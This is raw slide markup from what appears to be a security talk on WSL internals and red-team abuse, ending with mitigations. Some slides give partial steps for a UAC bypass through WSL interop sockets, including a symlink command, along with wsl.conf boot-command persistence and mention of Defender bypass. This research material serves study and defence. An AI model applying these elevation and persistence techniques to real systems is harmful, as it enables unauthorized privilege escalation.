                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>"notepad.exe"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>Force;</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t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>Start-Process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>"C:\Windows\System32\ComputerDefaults.exe"</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains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UAC bypass via interop</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310" name="Google Shape;310;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1289100"/>
            <a:ext cx="2847900" cy="6156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1. Execute UAC bypass using interop</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="Google Shape;311;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2282388"/>
            <a:ext cx="2847900" cy="615600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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2. Run wsl.exe -e dbus-launch true</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="312" name="Google Shape;312;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3501275"/>
            <a:ext cx="2847900" cy="831300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="FF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pl">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>4. Switch to the elevated socket using symlink</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="313" name="Google Shape;313;p41"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1680700" y="1904700"/>
            <a:ext cx="0" cy="377700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="314" name="Google Shape;314;p41"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1680700" y="2844600"/>
            <a:ext cx="0" cy="575700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="Google Shape;315;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3378675" y="1728300"/>
            <a:ext cx="5187900" cy="400200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF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pl">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>ln -sf /run/WSL/36_interop /run/WSL/8_interop</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="316" name="Google Shape;316;p41" title="Screenshot 2025-06-09 at 19.02.41.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3378675" y="2556203"/>
            <a:ext cx="5561999" cy="1152485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="Google Shape;317;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6380100" y="3520850"/>
            <a:ext cx="2508900" cy="187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3000"/>
              <a:t>Agenda</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>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l"/>
              <a:t>Intro to WSL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl" sz="1600"/>
              <a:t>Architecture overview</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl" sz="1600"/>
              <a:t>WSLg</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl" sz="1600"/>
              <a:t>Internals</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl" sz="1600"/>
              <a:t>Windows Defender plugin for WSL</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl"/>
              <a:t>WSL for Red Teams</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl" sz="1600"/>
              <a:t>WSL container escape &amp; Defender bypass</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl" sz="1600"/>
              <a:t>Elevation of WSL</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl" sz="1600"/>
              <a:t>Evil WSL distro</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl"/>
              <a:t>Mitigations</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2" title="Screen Recording 2025-06-12 at 12.44.15.mp4">
            <a:hlinkClick r:id="rId3"/>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="849925" y="196200"/>
            <a:ext cx="7444157" cy="483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Honorary mention: winget.exe</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="328" name="Google Shape;328;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="613887" y="1017726"/>
            <a:ext cx="7916226" cy="3991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Honorary mention: Extended Attributes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334" name="Google Shape;33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44" title="wsl-ea.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1017726"/>
            <a:ext cx="7238052" cy="3864925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="336" name="Google Shape;336;p44" title="wsl-settings.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2885100" y="2376200"/>
            <a:ext cx="4664650" cy="20893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Good ‘ol classics - pt.2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="342" name="Google Shape;34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l"/>
              <a:t>.lnk used to execute Linux/Windows binary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="343" name="Google Shape;343;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3030733"/>
            <a:ext cx="4947584" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="344" name="Google Shape;344;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4180700" y="1586600"/>
            <a:ext cx="4651600" cy="346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EvilWSL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="350" name="Google Shape;35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1" name="Google Shape;351;p46" title="image.jpg"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2390763" y="0"/>
            <a:ext cx="675322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“Persistence”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="357" name="Google Shape;357;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2212800" y="2009850"/>
            <a:ext cx="4718400" cy="1123800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="952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l" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>$cat /etc/wsl.conf</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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pl" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>[boot]</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>command = echo “Hello” &gt;&gt; /hello</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains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8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1412507"/>
            <a:ext cx="9144000" cy="23184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9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="475452"/>
            <a:ext cx="9143999" cy="419259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Next steps</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373" name="Google Shape;37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l"/>
              <a:t>* turning this research into “tool”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl"/>
              <a:t>* exploring further, even more “advanced” ideas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1"/>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pl"/>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3000"/>
              <a:t>WSL history</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79" name="Google Shape;79;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1274138" y="1017725"/>
            <a:ext cx="6595731"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title="image.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="476365" y="585249"/>
            <a:ext cx="8299837" cy="2131826"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="85" name="Google Shape;85;p17" title="image.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="476375" y="2976252"/>
            <a:ext cx="8299827" cy="1180347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="FF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title="image.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="8508" l="-590" r="590" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2100125" y="218825"/>
            <a:ext cx="4943749" cy="4705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3000"/>
              <a:t>WSL2 Architecture </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(from wsl.dev)</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Google Shape;96;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="376350" y="1388925"/>
            <a:ext cx="4104000" cy="3512700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="2857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chemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="Google Shape;97;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1017725"/>
            <a:ext cx="120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600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>WINDOWS</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="Google Shape;98;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4728300" y="1388925"/>
            <a:ext cx="4104000" cy="3512700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="lt1"/>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 name="Google Shape;99;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4663650" y="1017725"/>
            <a:ext cx="120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600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>LINUX VM</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Google Shape;100;p19"/>
